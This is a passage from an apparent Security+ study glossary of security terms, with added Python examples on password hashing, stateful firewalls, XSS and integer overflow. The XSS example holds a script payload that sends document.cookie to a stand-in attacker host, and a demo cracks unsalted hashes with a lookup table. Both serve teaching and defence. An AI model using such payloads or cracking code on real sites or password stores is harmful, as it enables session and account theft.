A storage area in which victims of an attack can upload malicious files and software code that can then be examined by others to learn more about these attacks and craft their defenses.
Simultaneous Authentication of Equals (SAE)
A strong authentication method used in WPA3 to authenticate wireless clients and APs and to prevent dictionary attacks for discovering pre-shared keys.
Certificate Signing Request (CSR)
A structured message sent to a certificate authority requesting a digital certificate.
Registration Authority (RA)
A subordinate entity designed to handle specific CA tasks such as processing certificate requests and authenticating users; performs certificate registration services on behalf of a CA.
Out-of-band management
A switch management option that provides on-site infrastructure access when the network is down or complete remote access in cases of connectivity failures on the network, such as via a cellular signal, in order to interface with a switch.
Switch Port Analyzer (SPAN)
A switch feature that copies Ethernet frames passing through one or more switch ports (or VLANs) and sends the copies out a designated monitor port. The switch itself doesn't analyze the copied frames; a sensor such as an IDS or packet capture tool attached to the monitor port does.
Identity Provider (IdP)
A system entity that creates, maintains, and manages identity information for principals and also provides authentication services to relying applications within a federation or distributed network.
Network-Based Intrusion Detection System (NIDS)
A system for examining network traffic to identify suspicious, malicious, or undesirable behavior.
Rights management
A system of data protection at the file level that uses various forms of permissions, rules, and security policies.
File integrity monitors
A system that detects any changes within the files that may indicate a cyberattack.
Global Positioning System (GPS)
A system that determines the precise position of something on Earth through a series of satellites, tracking stations, and receivers.
Directory services
A system that enables network resources to be viewed as objects stored in a database. This database can then be divided and distributed among different servers on the network. An example of directory services includes LDAP or Microsoft Active Directory.
UPS
A system that provides battery or other backup power options for short periods of time
Cyber Kill chain
A systematic outline of the steps of a cyberattack, introduced at Lockheed Martin in 2011.
Rainbow table
A precomputed table of hash values and their corresponding plaintexts that lets an attacker look up passwords by hash if they obtain a system's hashed password file; effective only against unsalted hashes.
Prepending
A technical method used in social engineering to trick users into entering their username and passwords by adding an invisible string before the weblink they click
Network Address Translation (NAT)
A technique that lets hosts with private (RFC 1918) IP addresses reach the public Internet; the NAT device rewrites the private source address to a public address on the way out and maps the replies back to the internal host.
Obfuscation/camouflage
A technique that essentially "hides" or "camouflages" code or other information so that it is harder to read by unauthorized users.
Secure Sockets Layer (SSL) stripping
A technique that involves removing the encryption between a client and a website.
Segmentation
A technique that is often employed before an incident occurs to place systems with different functions or data security levels in different zones or segments of a network.
Key stretching
A technique used to create encryption keys from passwords in a strong manner
Salting
A technique used to strengthen stored passwords: a random value (the salt) is added to each password before hashing and stored alongside the hash. Identical passwords then produce different hashes and precomputed rainbow tables become useless, although a salt alone does not slow a brute-force attack on a single hash (that is the job of key stretching).
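The Rainbow table, Key stretching and Salting entries above describe one attack and the two defenses against it. As an added example (not code from the original page), the block below first shows a precomputed hash-to-plaintext table cracking unsalted SHA-256 hashes, then stores passwords with PBKDF2-HMAC-SHA256 from the standard library, which adds a random salt and an iteration count. The candidate password list and the stored-hash format are constructed for the example.

```python
import hashlib
import hmac
import os

def unsalted_sha256(password: str) -> str:
    """The weak scheme the lookup table defeats: one fixed hash per password."""
    return hashlib.sha256(password.encode()).hexdigest()

def build_lookup_table(candidates):
    """Precomputed hash -> plaintext table. A rainbow table is the space/time
    trade-off of exactly this idea; the effect on unsalted hashes is the same."""
    return {unsalted_sha256(p): p for p in candidates}

def crack(stored_hashes, table):
    """Returns every stored hash that the precomputed table resolves."""
    return {h: table[h] for h in stored_hashes if h in table}

def hash_password(password: str, salt=None, iterations: int = 600_000) -> str:
    """Salted, stretched hash: PBKDF2-HMAC-SHA256. The random salt makes every
    stored value unique (no precomputation), the iteration count makes each
    guess expensive (key stretching). The '$'-separated format is hypothetical."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recomputes with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    # Constructed data: a short candidate list and a leaked unsalted hash file.
    table = build_lookup_table(["123456", "password", "letmein", "qwerty"])
    leaked = [unsalted_sha256("letmein"), unsalted_sha256("correct horse battery")]
    print("cracked:", crack(leaked, table))
    print("salted:", hash_password("letmein"))
```

Two users with the same password get different stored values, so the table built once cannot be reused, and each guess against a salted entry costs the full iteration count. The iteration count is stored with the hash so it can be raised later without invalidating existing records.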
Security Information and Event Management (SIEM)
A technology that allows for real-time analysis of security alerts generated by network hardware and applications.
Perfect forward secrecy
A property of key-exchange protocols that ensures session keys are not compromised if a long-term key (such as a server's private key) is compromised at a later date; each session derives its key from ephemeral values (for example ephemeral Diffie-Hellman) that are discarded afterwards, so recorded traffic cannot be decrypted retroactively.
Data custodian
A term for individuals or teams who do not have controller or stewardship responsibility but are responsible for the secure safekeeping of information. For example, a data controller might delegate responsibility for securing PII to an information security team.
Data processor
A term for service providers that process personal information on behalf of a data controller. An example is a credit card processing service for a retailer.
Narrowband
A term that refers to communications channels that have low bandwidth (slower communication); generally have less noise and thus better range and sensitivity
data sovereignty
A term that refers to the legal implications of data stored in different countries. It is primarily a concern related to backups stored in alternate locations via the cloud.
Order of volatility
A term that refers to the order in which you should collect evidence; documents what data is most likely to be lost due to system operations or normal processes.
Insider Threat
A threat to an organization that comes from employees, contractors, and anyone else that may have willingly been given insider knowledge.
Time stamp
A time value that is associated with a data value, often indicating when some event occurred that affected the data value.
Phishing simulations
A training or simulation that helps employees recognize phishing emails.
Certificate Authority (CA)
A trusted third-party organization or company that issues digital certificates
SYN flood
A type of DoS where an attacker sends a large amount of SYN request packets to a server in an attempt to deny service.
Machine learning
A type of artificial intelligence that leverages massive amounts of data so that computers can improve the accuracy of actions and predictions on their own without additional programming.
Snapshot
A type of backup that captures the full state of a system or device at the time the backup is completed; common for VMs
Extended validation certificates
A type of certificate issued by a CA; they provide a higher level of assurance and the CA takes steps to verify that the certificate owner is a legitimate business before issuing the certificate.
Field Programmable Gate Array
A type of computer chip that can be programmed to redesign how it works, allowing it to be a customizable chip; is not an embedded system alone - needs to be integrated as one component of an embedded system or as the program processor inside of one.
USB
A type of connection used to attach devices such as flash drives, scanners, cameras, and printers to a computer.
Stateful firewall
A type of firewall that inspects traffic leaving the inside network as it goes out to the Internet. Then, when returning traffic from the same session (as identified by source and destination IP addresses and port numbers) attempts to enter the inside network, this firewall permits that traffic.
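The session tracking the Stateful firewall entry describes, as an added example that is not part of the original page: outbound packets create state keyed on the session's addresses and ports, inbound packets are permitted only when they match existing state, and idle entries expire. The packet records, addresses (from the documentation ranges) and timeout are constructed for the example; a real firewall would also track TCP flags and sequence numbers.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    direction: str   # "out" = leaving the inside network, "in" = arriving from outside

class StatefulFirewall:
    """Tracks outbound sessions by their 4-tuple and admits inbound packets
    only when they belong to a tracked session that has not idled out."""

    def __init__(self, idle_timeout: int = 300):
        self.idle_timeout = idle_timeout
        # (inside_ip, inside_port, outside_ip, outside_port) -> last_seen timestamp
        self.sessions = {}

    def _expire(self, now: int) -> None:
        self.sessions = {k: t for k, t in self.sessions.items()
                         if now - t <= self.idle_timeout}

    def process(self, pkt: Packet, now: int) -> str:
        self._expire(now)
        if pkt.direction == "out":
            key = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
            self.sessions[key] = now           # create or refresh state
            return "permit"
        # Inbound: look up the mirror of the outbound tuple.
        key = (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port)
        if key in self.sessions:
            self.sessions[key] = now
            return "permit"
        return "deny"                           # unsolicited inbound traffic

def run(fw: StatefulFirewall, traffic):
    """Feeds (timestamp, packet) pairs through the firewall, returning decisions."""
    return [fw.process(p, t) for t, p in traffic]

if __name__ == "__main__":
    # Constructed traffic: one HTTPS session from an inside host, its reply,
    # then unsolicited inbound packets and a late reply after the idle timeout.
    fw = StatefulFirewall(idle_timeout=60)
    traffic = [
        (0, Packet("10.0.0.5", 51000, "203.0.113.10", 443, "out")),
        (1, Packet("203.0.113.10", 443, "10.0.0.5", 51000, "in")),
        (2, Packet("203.0.113.10", 443, "10.0.0.5", 51001, "in")),
        (3, Packet("198.51.100.9", 443, "10.0.0.5", 51000, "in")),
        (100, Packet("203.0.113.10", 443, "10.0.0.5", 51000, "in")),
    ]
    print(run(fw, traffic))
```

The state table is what distinguishes this from a packet filter: the same inbound packet is permitted or denied depending on what the inside host did earlier, which is also why state-table exhaustion is an attack surface of its own.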
server-side execution and validation
A type of input validation that indicates that the code runs on the server, such as a web server.
Active/active load balancing
A type of load balancing where all servers are active and load balancer can use any of the servers at any time.
Active-passive load balancing
A type of load balancing where some servers are active and others on standby. A standby is used if an active fails, and it takes the previously active server offline until its repaired.
Zero trust network
A network security model in which no user, device, or traffic flow is trusted by default, inside or outside the perimeter: every request must be authenticated and authorized before access to a resource is granted, typically enforced through fine-grained segmentation.
Forward Proxy Server
A type of proxy server that acts as middleman between clients and servers, making requests to network servers on behalf of clients. Results are sent to the proxy server, which then passes them to the original client.
Reverse Proxy Server
A type of proxy server that acts on behalf of its servers, which gathers information from its associated servers, and hands that information to the clients.
SCADA
A type of system architecture that combines data acquisition and control devices, computers, communications capabilities, and an interface to control and monitor the entire architecture.
Containers
A type of virtualization that allows for shared operating systems for more resource savings and faster execution
Remote access VPN
A user-to-LAN virtual private network connection used by remote users.
Bandwidth monitors
A utility designed to measure network bandwidth usage over time; sustained high utilization means links or systems are saturated, which explains slow performance and can also reveal anomalies such as data exfiltration or a DoS.
Quality of Service
A variety of techniques that control the flow of network traffic, improve transmission speeds, and improve real-time communications traffic
sFlow
A vendor-neutral industry standard for traffic analysis and data exporters at layer 2 of the OSI reference model.
Site-to-site VPN
A virtual private network in which multiple sites can connect to other sites over the Internet.
Zero-day exploit
A vulnerability that is exploited before the software creator/vendor is even aware of its existence.
Binary
A way of representing information using only two options (0 and 1).
Cross-Site Scripting (XSS)
A web application vulnerability in which attackers inject malicious HTML or JavaScript through unvalidated input (a form field, URL parameter, or stored comment) that the site echoes into its pages without encoding; the script then executes in the browser of each user who views the page, in that user's session context.
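The injection and its fix, as an added example that is not part of the original page: a server-side template that concatenates a user comment into HTML lets a script tag through, while the same template with output encoding renders it as inert text. The payload and the attacker's domain are constructed for the example; html.escape is the standard-library encoder.

```python
import html

# Constructed untrusted input: a comment body submitted by a user.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'

def render_comment_vulnerable(comment: str) -> str:
    """Concatenates raw input into the page: the script tag survives and runs
    in every visitor's browser (stored XSS)."""
    return f'<div class="comment">{comment}</div>'

def render_comment_safe(comment: str) -> str:
    """Encodes the HTML-significant characters (& < > " ') so the input is
    displayed as text rather than parsed as markup."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

def render_attribute_safe(value: str) -> str:
    """Attribute context: quote=True keeps a value from closing the quoted
    attribute early and smuggling in an event handler."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'

def contains_live_tag(rendered: str, tag: str) -> bool:
    """Demo helper: a tag is live only if its '<' reached the page unencoded."""
    return f"<{tag}" in rendered.lower()

if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_attribute_safe('" autofocus onfocus="alert(1)'))
```

Encoding must match the context the data lands in: html.escape covers element bodies and quoted attributes, but a value placed inside a script block, a URL, or CSS needs that context's own encoding, and a Content-Security-Policy limits the damage when an encoding is missed.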
Aggregators
A website or software application that gathers together information from a variety of internet sources.
Secure Multipurpose Internet Mail Extensions
A widely accepted protocol for sending digitally signed and encrypted messages.
Disassociation attack
A wireless attack in which false de-authentication or disassociation frames are sent to an AP that appear to come from another client device, causing the client to disconnect.
NFC
A wireless technology that lets your mobile device communicate over very short distances, such as when paying for goods on wireless payment devices.
Business Partnership Agreement (BPA)
A written agreement defining the terms and conditions of a business partnership; exists when two organizations agree to do business with each other in a partnership.
Privacy notice
A written explanation of how the company handles and shares your personal financial information.
Chain of custody
A written record of all people who have had possession of an item of evidence; simple sign-off and documentation forms; each time the drive, device, or artifact is accessed, transferred, or otherwise handled, it is documented.
Name 3 Layer 2 attacks
ARP poisoning, MAC flooding, MAC cloning
Examples of personnel policies important to organizational security
Acceptable use policy Job rotation Mandatory vacation Separation of duties Least privilege Clean desk space Background checks Non-disclosure agreement Social media analysis Onboarding Offboarding User training
Card cloning
Act of using acquired information from a skimmer that can be made into a duplicate card, most commonly found when duplicating gift cards; can't duplicate chips, only magnetic strips
Vertical Scalability
Adding resources to one machine to accommodate additional work; requires a more powerful system or device
SSH keys
Additional authentication method that SFTP uses to ensure that data is secure
Advisories and bulletins
Advisories and bulletins provide detailed updates on cyber threats. They are usually updated weekly.
Two types of Network access control implementations
Agent and agentless
Symmetric key algorithms
Algorithm that uses the same key to perform both encryption and decryption; sender encrypts with the shared secret key and the receiver decrypts with it.
Asymmetric key algorithms
Also known as Public Key Algorithms; each user has two keys: a public key which is shared with all users and a private key which is a secret and only known to the user.
rsyslog
Alternative 'rocket-fast' version of syslog; useful when speed is necessary; supports extremely high message rates, secure logging via TLS, and TCP-based messages as well as multiple backend database options.
Integrity measurement
An "attestation mechanism" designed to ensure that an application is running only known and approved executables.
Privacy Enhanced Mail
An ASCII text format of digital certificates; normally stored in files with the .PEM or .CRT extensions.
Extensible Authentication Protocol-FAST
An EAP protocol developed by Cisco; used in wireless networks and point-to-point connections to perform session authentication. Its purpose is to replace the LEAP (lightweight extensible authentication protocol).
Extensible Authentication Protocol-TTLS
An EAP protocol that extends TLS; the server is authenticated with a CA-signed certificate, and the client can, but does not have to, be authenticated with a certificate of its own (typically it authenticates with a password inside the TLS tunnel instead).
Inline sensor
An IDPS sensor that is inserted into a network segment so that the traffic that it is monitoring must pass through the sensor; intended for network perimeter use and deployed in close proximity to a perimeter firewall to detect incoming attacks that could overwhelm the firewall.
Passive sensor
An IDPS sensor that monitors the traffic via a copying process, so the actual traffic does not flow through or depend upon the sensor for connectivity
IEEE 802.1x
An IEEE standard for port-based network access control (PNAC) on wired and wireless access points.
Virtual IP address
An IP address that can be shared by a group of routers.
Authentication Header
An IPSec component that provides connectionless integrity and the authentication of data. It also provides protection versus replay attacks.
Encapsulating Security Payload
An IPSec component that provides the same services as AH but also provides confidentiality when sending data.
Managed service provider
An IT service where the customer dictates both the technology and operational procedures, and an external party executes administration and operational support according to a contract.
arp
An Internet protocol and command-line utility used to map an IP address to a MAC address.
Structured Threat Information eXpression (STIX)
A structured language for expressing and sharing threat intelligence; originally sponsored by the US Department of Homeland Security. STIX 1.x was XML-based; the current STIX 2.x uses JSON.
Security Assertion Markup Language (SAML)
An XML-based standard used to exchange authentication and authorization information.
Role-Based Access Control (RBAC)
An access control model that bases the access control authorizations on the roles (or functions) that the user is assigned within an organization
Rule-Based Access Control
An access control model that can dynamically assign roles to subjects based on a set of rules defined by a custodian.
Attribute-based access control (ABAC)
An access control model that grants access to resources based on attributes assigned to subjects and objects.
Log reviews
An activity conducted to ensure privileged users are not abusing their privileges; this activity would be used to detect anomalies on a network
War flying
An activity consisting of using an airplane and a Wi-Fi-equipped computer, such as a laptop or a PDA, to detect Wi-Fi wireless networks.
Memorandum of Understanding (MOU)
An agreement between two or more parties to enable them to work together that is not legally enforceable but is more formal than an unwritten agreement; an informal mechanism that allows the parties to document their relationship to avoid future misunderstandings.
End of life/End of service life agreement
An agreement between two parties that ensures an orderly transition or outlines what steps will be taken when a vendor relationship ends or the vendor is discontinuing a product or service on which the organization depends.
HMAC algorithm
An algorithm that implements a partial digital signature; it guarantees the integrity of a message during transmission, but it does not provide for nonrepudiation
Elliptic-curve cryptography
An algorithm that uses elliptic curves instead of prime numbers to compute keys; based on the fact that finding the discrete logarithm of a random elliptic curve element with respect to a publicly known base point is difficult to the point of being impractical to do so.
syslog-ng
An alternative to syslog that provides enhanced filtering, direct logging to databases, and support for sending logs via TCP protected by TLS.
Integer overflow
An application attack that attempts to use or create a numeric value that is too big for an application to handle. Input handling and error handling thwart the attack.
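The length-check bypass behind many integer overflow attacks, as an added example that is not part of the original page: in a language with fixed-width unsigned integers, `offset + length <= buf_size` wraps around when the attacker supplies a length close to 2^32, so a hostile record passes the check. Python integers never wrap, so the block models 32-bit arithmetic with a mask; the record format (4-byte big-endian length, then payload) is constructed for the example.

```python
import struct

UINT32_MAX = 0xFFFFFFFF

def u32(x: int) -> int:
    """Models unsigned 32-bit arithmetic: Python ints never wrap, C's do."""
    return x & UINT32_MAX

def bounds_check_vulnerable(offset: int, length: int, buf_size: int) -> bool:
    """The C idiom `if (offset + length <= buf_size)` with uint32 operands.
    A length near 2^32 wraps the sum to a small number and the check passes."""
    return u32(offset + length) <= buf_size

def bounds_check_safe(offset: int, length: int, buf_size: int) -> bool:
    """Rearranged so no addition can overflow: operands are range-checked and
    the comparison uses a subtraction that cannot go negative."""
    if not (0 <= offset <= buf_size and 0 <= length <= UINT32_MAX):
        return False
    return length <= buf_size - offset

def parse_record_vulnerable(packet: bytes):
    """Constructed format: 4-byte big-endian length, then payload.
    Returns (claimed_length, payload) or None if rejected."""
    length = struct.unpack(">I", packet[:4])[0]
    offset = 4
    if not bounds_check_vulnerable(offset, length, len(packet)):
        return None
    # In C this is where memcpy(dst, packet + offset, length) would read
    # far past the end of the buffer; Python slicing silently truncates.
    return length, packet[offset:offset + length]

def parse_record_safe(packet: bytes):
    """Same format, overflow-proof check."""
    length = struct.unpack(">I", packet[:4])[0]
    offset = 4
    if not bounds_check_safe(offset, length, len(packet)):
        return None
    return length, packet[offset:offset + length]

if __name__ == "__main__":
    hostile = struct.pack(">I", 0xFFFFFFFC) + b"ABCD"   # 4 + 0xFFFFFFFC wraps to 0
    print(parse_record_vulnerable(hostile), parse_record_safe(hostile))
```

The fix is not a bigger integer type (a 64-bit sum can be wrapped by a 64-bit length) but a check that cannot overflow by construction; compilers can also flag the wrapped addition with sanitizers such as UBSan's unsigned-integer-overflow check.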
Authentication applications
An application that functions by accepting user input, and if the user input is correct, it can pass the appropriate credentials to the system requesting authentication.
Certificate pinning
An approach to verifying a certificate by instructing browsers to attach a certificate to a subject for an extended period of time. When sites do this, the browser associates that site with their public key. This allows administrators or users to notice and intervene if a certificate unexpectedly changes.
Indicators of Compromise (IoCs)
An artifact observed on a network or in operating system that with high confidence indicates a computer intrusion; represents intrusion signature; IDS can be tuned to watch for the signature to prevent future compromise
Media access control (MAC) cloning
An attack in which an attacker falsifies the factory-assigned MAC address of a device's network interface
Brute force attack
An attack on passwords or encryption that tries every possible password or encryption key.
Smurf attack
An attack that sends an ICMP echo request to a network's broadcast address with the source address spoofed to the victim's, so every host on that network replies to the victim; an amplified DoS.
Domain hijacking
An attack that changes the registration of a domain name without permission from the owner.
Address Resolution Protocol (ARP) poisoning
An attack that convinces the network that the attacker's MAC address is the one associated with an allowed address so that traffic is wrongly sent to the attacker's machine
Impersonation
An attack that creates a fictitious character and then plays out the role of that person on a victim.
Privilege Escalation
An attack that exploits a vulnerability in software to gain access to resources that the user normally would be restricted from accessing.
UDP floods
An attack that sends a large number of UDP packets to random ports on the victim's system. The system will notice that no application listens at that port and reply with an ICMP destination unreachable packet. If a large enough number of UDP packets are sent, the victim will be forced to send numerous ICMP packets in response, overwhelming the system.
ICMP floods
An attack that sends massive numbers of ICMP packets, with each requesting a response; require more aggregate bandwidth on the side of the attacker than the defender has, which is why a DDoS via ICMP may be attempted; sometimes referred to as ping floods
Media access control (MAC) flooding
An attack that sends numerous frames to a switch, each with a different source MAC address, in an attempt to exhaust the switch's MAC (CAM) table. If this succeeds, the switch changes to fail-open mode and floods frames out every port like a hub, which lets the attacker sniff traffic meant for other hosts.
Uniform Resource Location (URL) redirection
An attack that sends unsuspecting web users to untrusted sites.
DNS poisoning
An attack that substitutes DNS addresses so that the computer is automatically redirected to an attacker's device.
Christmas Tree attack
An attack that uses a TCP packet with every flag set (for example FIN, URG, and PSH together, hence "lit up like a Christmas tree"). Used to conduct reconnaissance, since operating systems respond differently to such illegal flag combinations, or as a DoS attack if sent in large numbers.
OpenID
An authentication protocol that works across participating sites; an open standard and decentralized authentication protocol.
Knowledge-based authentication
An authentication technique that requires the user to provide a pre-established piece or several pieces of information that he/she knows.
Collector
An automated sensor that gathers actual state data. Part of the collection system.
Full tunnel VPN
An encrypted connection used with VPN's in which all of the traffic from the user is encrypted once they connect to the VPN.
Split tunnel VPN
An encrypted connection used with VPN's that only encrypts traffic going to private IP addresses used in the private network.
Hypertext Transfer Protocol Secure
An encrypted form of information transfer on the Internet that combines HTTP and TLS
Block cipher
An encryption method that operates on "chunks" of a message and applies the encryption algorithm to an entire message chunk at the same time; An encryption method that encrypts data in fixed-sized blocks.
Stream cipher
An encryption method that operates on one bit or byte of a message at a time, typically by XORing it with a pseudorandom keystream derived from the key; fast and suited to streaming data, but the keystream must never be reused with the same key and nonce.
Counter-mode/CBC-MAC protocol
An encryption protocol designed for Wireless LAN products that implements the standards of the IEEE 802.11i amendment to the original IEEE 802.11 standard.
hping
An enhanced Ping utility for crafting TCP and UDP packets to be used in port-scanning activities.
Hybrid cloud
An environment that includes two or more private, public, or community clouds, but each cloud remains separate and is only linked by technology that enables data and application portability
Private cloud
An environment that serves only one customer or organization and can be located on the customer's premises or off the customer's premises.
Development Environment
An environment used to create or modify IT services or applications.
Capture the flag (CTF)
An exploit-based exercise simulating an attack; programs that pit technologists against one another in an attempt to attack a system and achieve a specific goal, such as stealing a sensitive file.
Certificate stapling
An extension to the OCSP that relieves some of the burden placed upon CAs by the original protocol; instead of the end user being responsible for contacting an OCSP server to verify the certificate's validity, the web server contacts the OCSP server itself and receives a signed and timestamped response from the OCSP server, which it then attaches, or staples, to the digital certificate.
Radio Frequency Identification (RFID)
An identification method that uses electronic tags and labels to identify objects wirelessly over short distances
Cloud security alliance
An industry organization focused on developing and promoting best practices in cloud security.
Unified Extensible Firmware Interface (UEFI)
An interface between firmware on the motherboard and the operating system; improves on legacy BIOS processes for booting, handing over the boot to the OS, and loading device drivers and applications before the OS loads.
Challenge Handshake Authentication Protocol (CHAP)
An older three-way authentication handshake that is accomplished during the initial authentication and may be repeated anytime after the link has been established; a weak authentication protocol that has been replaced by the Extensible Authentication Protocol (EAP).
Common Vulnerabilities and Exposures (CVE)
An online list of known vulnerabilities (and patches) to software, especially web servers. It is maintained by the MITRE Corporation.
OAuth
An open source standard used for authorization with Internet-based single sign-on solutions.
IPFIX
An open standard based on NetFlow 9 that many vendors support; a standard format for exporting router-based information about network traffic flows to data collection devices
NXLog
An open-source alternative to syslog, also offered as a commercially supported syslog centralization and aggregation tool, that can parse and generate log files in many common formats while also sending logs to analysis tools and SIEM solutions.
Autopsy (utility)
An open-source forensic suite with broad capabilities.
Real-Time Operating System
An operating system that reacts to current events and actions occurring around it; used when priority needs to be placed on processing data as it comes in, rather than using interrupts for the OS or waiting for tasks being processed to be handled before data is processed.
Restoration order
An order of what needs to be in place and operational first in the case of a disaster; decisions that balance the criticality of systems and services to the operation of the organization against the need for other infrastructure to be in place and operational to allow each component to be online, secure, and otherwise running properly.
International Organization for Standardization (ISO)
An organization that publishes a series of standards that offer best practices for cybersecurity and privacy.
Mandatory vacation
An organizational policy that serves a similar purpose as job rotation; this practice forces employees to take annual vacations of a week or more of consecutive time and revokes their access privileges during that vacation period.
Job rotation
An organizational practice that takes employees with sensitive roles and moves them periodically to other positions in the organization. The motivating force behind these efforts is that many types of fraud require ongoing concealment activities, which are harder to accomplish if an employee does not remain in the same role for an extended period of time.
Plaintext/Cleartext
An original message or file that has not yet been encrypted
Rogue access point
An unauthorized AP that allows an attacker to bypass many of the network security configurations and opens the network and its users to attacks.
Push notifications
Any content sent to a mobile device that a customer must opt in to receive from a marketer.
Key exchange
Any method by which cryptographic keys are transferred among users, thus enabling the use of a cryptographic algorithm.
Three options for reconfiguring endpoint security solutions
Application allow list, application deny/block list, quarantine filter
Thirteen implementations that can be done using MDM
Application management, content management, remote wipe, geofencing, screen locks, push notifications, passwords and PINs, biometrics, context-aware authentication, containerization, storage segmentation, full device encryption
Wireshark
Application that captures and analyzes network packets; a popular packet sniffer.
Standard Naming Convention
Applying consistent names and labels to assets and digital resources/identities within a configuration management system.
Resource policies
Assigning permissions to cloud resources; can be difficult since the cloud is always running.
Volume-based network DDoS attacks
Attacks that focus on the sheer amount of traffic causing a DoS condition; some rely on amplification techniques that leverage flaws or features in protocols and services to create significantly more traffic than the attacker sends
Protocol-based DDoS attacks
Attacks that focus on the underlying protocols used for networking
Three As that compose the framework for intelligently controlling access to computer resources, enforcing policies, auditing usage, and providing the information necessary to bill for services.
Authentication, authorization, and accounting
Automated Courses of Action
Automated scripts that give a basis for secured configuration with a secured template. Can be configured to accommodate constant changes or can be launched on a specific schedule.
Vulnerability scans
Automated tools designed to identify whether a given system possesses any well-known vulnerabilities.
Five deployment models used by organizations for devices
BYOD, COPE, CO, CYOD, VDI
Cloud backup
Backup method in which files are backed up to the cloud as they change; long-term archival storage models that are used for data that is unlikely to be needed; examples are Amazon's Glacier and Google's Coldline
Differential backup
Backup that copies all changes made since the last full backup
Full backup
Backup that copies all data from a system.
Incremental backup
Backup that copies only the changed data since the last backup.
Offline backup
Backups that need to be retrieved from a storage location before they can be accessed; not done over the Internet.
Honeyfile
Bait files intended for hackers to access. The files reside on a file server, and the server sends an alarm when accessed.
Facial scan
Biometric control that compares a picture of a face to pictures stored in a database
Retina scan
Biometric laser scan of the capillaries which feed the retina (blood vessel pattern).
Gait analysis
Biometric mechanism that identifies a subject based on movement pattern.
Four categories of security locks
Biometrics, electronic, physical, cable
Two major categories of modern ciphers/cipher suites
Block and stream
Five options for secure data destruction
Burning, shredding, pulping, pulverizing, degaussing
Examples of sources of information acquisition
CPU cache, ephemeral data, RAM, Swap and pagefile information, files and data on a disk change, OS, mobile devices, firmware, snapshots, network traffic and logs, artifacts (devices, printouts, media, etc.)
2 examples of vulnerability databases
CVE (Common Vulnerabilities and Exposures), U.S. National Vulnerability Database (NVD)
Two simple examples of substitution ciphers
Caesar cipher and ROT13
Motion recognition cameras
Cameras that activate when motion occurs
Object detection cameras
Cameras that can detect specific objects, or they have areas that they watch for changes
Examples of user training methodologies
Capture the flag, gamification, phishing simulations, computer-based training, role-based training
Redundant NICs
Cards used to ensure connectivity in situations where a system's availability is important and multiple systems cannot be reasonably used.
Supervisory Control and Data Acquisition
Centralized systems which monitor and control industrial sites, or complexes of systems spread out over large areas; large systems that run power and water distribution or other systems that cover large areas
Self-signed certificates
Certificates signed by an organization for their employees; these certificates won't be trusted by the browsers of external users, but internal systems may be configured to trust the internal CA, saving the expense of obtaining certificates from a third-party CA.
What tools are available to search for rootkits?
Chkrootkit, rkhunter
Code reuse/dead code
Code that can be used for some future use, project, etc. Typically better to write clean code that can be minimally modified/refactored in the future.
Static codes
Codes that do not change over time.
Virtual machine sprawl avoidance
Combating VM sprawl through using different procedures.
Provisioning and deprovisioning
Commissioning/decommissioning of assets, from the time an asset is installed until the time it is decommissioned and disposed of.
Vulnerability databases
Common source of threat intelligence; researchers find vulnerabilities and upload them here because everyone needs to know about them.
Four critical incident response plans
Communication plan, stakeholder management, disaster recovery plan, business continuity plan
Cloud service providers
Companies that provide software, data storage, and other services via the internet
Third party data destruction services
Companies that will pick up and remove sensitive documents and media for shredding at their facility, or they will perform the same service on-site; your organization may opt for a thoroughly documented destruction process, including photos of the devices and per-device destruction certification depending on their security needs.
Industrial Control Systems
Computer based systems that monitor and control industrial processes that exist in the physical world; a broad term for industrial automation
Embedded systems
Computer system(s) hidden inside another device, such as a car engine management system, appliances, or industrial machinery
Digital certificates provide communicating parties with the assurance that the people they are communicating with truly are who they claim to be. They also provide assurance for the public keys of...
Computers/machines, individual users, email addresses, developers (code-signing certificates)
On-premise
Computing resources hosted locally in a company's data center or physical location.
Off-premise
Computing resources hosted remotely from a company's data center.
Cellular connection
Connection that provides high speed transmission over cell phone towers.
Infrared
Connection to a line-of-sight wireless network to access technologies, such as TV and other audiovisual equipment.
Storage area networks
Connects multiple storage devices on a separate high-speed network dedicated to storage (backup); can also be used as a means of replicating data, where it uses RAID to ensure that data is not lost.
Compensating controls
Controls designed to mitigate the risk associated with exceptions made to a security policy.
Detective controls
Controls that identify security events that have already occurred. IDS systems are an example of this.
Preventive controls
Controls that intend to stop a security issue before it occurs. Firewalls and encryption are examples of this.
Corrective controls
Controls that remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of this.
Deterrent controls
Controls that seek to prevent an attacker from attempting to violate security policies. Vicious guard dogs and barbed wire fences are examples of this.
Secure cookies
Cookies that have the secure attribute set so that they can only be transmitted over a TLS encrypted session.
Virtualization
Creates multiple "virtual" machines on a single computing device; the practice of sharing or pooling computing resources, such as servers and storage devices.
Smart card authentication
Credit card-sized card with embedded integrated circuits that is used to provide identification security authentication.
Lightweight cryptography
Cryptographic algorithms with reduced compute requirements that are suitable for use in resource-constrained environments, such as battery-powered devices.
Threat feeds
Cybersecurity data feeds that provide information on the latest threats.
Operational technology DDoS
DDoS attacks that target the hardware and software that controls devices and systems in factories, buildings, powerplants, and other industries
Formats of digital certificates
DER, PEM, PFX, P7B
Three common symmetric cryptosystems
DES, 3DES, AES
Metadata
Data about other data; in the case of systems and services, this is created as part of files, embedded in documents, used to define structured data, and included in transactions and network communications, among many other places you can find it.
Three types of data policies every organization should have
Data classification, data governance, data retention
Mobile metadata
Data collected by phones and other mobile devices as they are used; includes call logs, SMS and other message data, data usage, GPS location tracking, cellular tower information, and other details found in call data records.
Web metadata
